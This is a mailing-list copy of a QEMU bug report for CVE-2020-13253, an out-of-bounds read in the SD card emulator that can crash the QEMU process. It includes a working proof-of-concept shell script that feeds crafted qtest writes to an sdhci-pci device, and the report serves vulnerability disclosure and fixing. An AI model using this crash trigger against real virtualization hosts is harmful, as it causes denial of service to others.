[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug 1880822] Re: CVE-2020-13253 QEMU: sd: OOB access could crash the gu
|
From: |
P J P |
|
Subject: |
[Bug 1880822] Re: CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in DoS |
|
Date: |
Wed, 27 May 2020 07:15:19 -0000 |
#!/bin/sh
cat << EOF > inp
outl 0xcf8 0x80001810
outl 0xcfc 0xe1068000
outl 0xcf8 0x80001814
outl 0xcf8 0x80001804
outw 0xcfc 0x7
outl 0xcf8 0x8000fa20
write 0xe106802c 0x1 0x6d
write 0xe106800f 0x1 0xf7
write 0xe106800a 0x6 0x9b4b9b5a9b69
write 0xe1068028 0x3 0x6d6d6d
write 0xe106800f 0x1 0x02
write 0xe1068005 0xb 0x055cfbffffff000000ff03
write 0xe106800c 0x1d
0x050bc6c6c6c6c6c6c6c6762e4c5e0bc603040000000000e10200110000
write 0xe1068003 0xd 0x2b6de02c3a6de02c496de02c58
EOF
../bin/qemu-system-x86_64 -qtest stdio -enable-kvm -monitor none \
-serial none -M pc-q35-5.0 -device sdhci-pci,sd-spec-version=3 \
-device sd-card,drive=mydrive -nographic \
-drive if=sd,index=0,file=null-co://,format=raw,id=mydrive < inp
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1880822
Title:
CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in
DoS
Status in QEMU:
New
Bug description:
An out-of-bounds read access issue was found in the SD Memory Card
emulator of the QEMU. It occurs while performing block write commands
via sdhci_write(), if a guest user has sent 'address' which is OOB of
's->wp_groups'. A guest user/process may use this flaw to crash the
QEMU process resulting in DoS.
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1880822/+subscriptions